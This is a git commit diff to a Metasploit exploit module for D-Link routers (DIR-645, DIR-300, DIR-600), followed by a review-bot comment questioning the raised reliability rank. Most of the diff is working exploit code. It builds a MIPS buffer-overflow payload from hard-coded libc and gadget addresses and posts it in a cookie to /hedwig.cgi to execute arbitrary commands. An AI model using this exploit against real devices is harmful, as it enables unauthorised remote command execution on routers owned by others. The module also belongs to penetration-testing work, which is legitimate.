clean up
parent
a3ae177347
commit
8eb21ded97
|
@ -6,7 +6,7 @@
|
|||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ManualRanking # the exploit as it is is excellent but we can only start the telnetd and connect to it
|
||||
Rank = ExcellentRanking
|
||||
|
||||
HttpFingerprint = { :pattern => [ /Linux,\ HTTP\/1.0,\ DIR-/ ] }
|
||||
|
||||
|
@ -39,10 +39,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
],
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'D-Link DIR-645 v1.03',
|
||||
[ 'Multiple Targets: D-Link DIR-645 v1.03, DIR-300 v2.14, DIR-600',
|
||||
{
|
||||
'Offset' => 973,
|
||||
'LibcBase' => 0x2aaf8000, #Router
|
||||
'LibcBase' => 0x2aaf8000, # Router
|
||||
#'LibcBase' => 0x40854000, # QEMU environment
|
||||
'System' => 0x000531FF, # address of system
|
||||
'CalcSystem' => 0x000158C8, # calculate the correct address of system
|
||||
|
@ -84,13 +84,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
)
|
||||
end
|
||||
|
||||
|
||||
def prepare_shellcode(cmd)
|
||||
|
||||
# prepare our shellcode that triggers the crash:
|
||||
shellcode = "\x41" * target['Offset'] # padding
|
||||
shellcode = rand_text_alpha_upper(target['Offset']) # padding
|
||||
shellcode << [target['LibcBase'] + target['System']].pack("V") # s0 - address of system
|
||||
shellcode << "\x42" * 16 # unused reg $s1 - $s4
|
||||
shellcode << rand_text_alpha_upper(16) # unused reg $s1 - $s4
|
||||
shellcode << [target['LibcBase'] + target['CallSystem']].pack("V") # s5 - second gadget (call system)
|
||||
|
||||
# .text:000159CC 10 00 B5 27 addiu $s5, $sp, 0x170+var_160 # get the address of our command into $s5
|
||||
|
@ -100,14 +97,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# .text:000159DC 09 F8 20 03 jalr $t9 # call system
|
||||
# .text:000159E0 21 20 A0 02 move $a0, $s5 # our cmd -> into a0 as parameter for system
|
||||
|
||||
shellcode << "\x43" * 12 # unused registers $s6 - $fp
|
||||
shellcode << rand_text_alpha_upper(12) # unused registers $s6 - $fp
|
||||
shellcode << [target['LibcBase'] + target['CalcSystem']].pack("V") # $ra - gadget nr 1 (prepare the parameter for system)
|
||||
|
||||
# .text:000158C8 21 C8 A0 02 move $t9, $s5 # s5 - our second gadget
|
||||
# .text:000158CC 09 F8 20 03 jalr $t9 # jump the second gadget
|
||||
# .text:000158D0 01 00 10 26 addiu $s0, 1 # s0 our system address - lets calculate the right address
|
||||
|
||||
shellcode << "\x99" * 16 # filler in front of our command
|
||||
shellcode << rand_text_alpha_upper(16) # filler in front of our command
|
||||
shellcode << cmd
|
||||
end
|
||||
|
||||
|
@ -117,7 +114,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
begin
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
#'uri' => "/hedwig_gdb.cgi", #for debugging on the router
|
||||
'uri' => "/hedwig.cgi",
|
||||
'cookie' => "uid=#{shellcode}",
|
||||
'encode_params' => false,
|
||||
|
|
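Review bot: The new `Rank = ExcellentRanking` does not fit a module whose `prepare_shellcode` overwrites saved registers with addresses computed from a hard-coded `LibcBase`; Metasploit's ranking guidance reserves Excellent for exploits that can never crash the service and excludes typical memory-corruption modules. The same commit widens the single target entry to three models (DIR-645 v1.03, DIR-300 v2.14, DIR-600) while keeping one set of `Offset`/`LibcBase`/`System` values, so a mismatch on any firmware build would likely crash the web server on the device under test, and tooling that filters by rank would still select the module. I would keep a lower rank such as `Rank = NormalRanking` and add a comment above the target hash listing the firmware builds on which the offsets were actually verified. The class body and the target hash continue outside the visible hunks, so any per-target handling defined there is not visible from here.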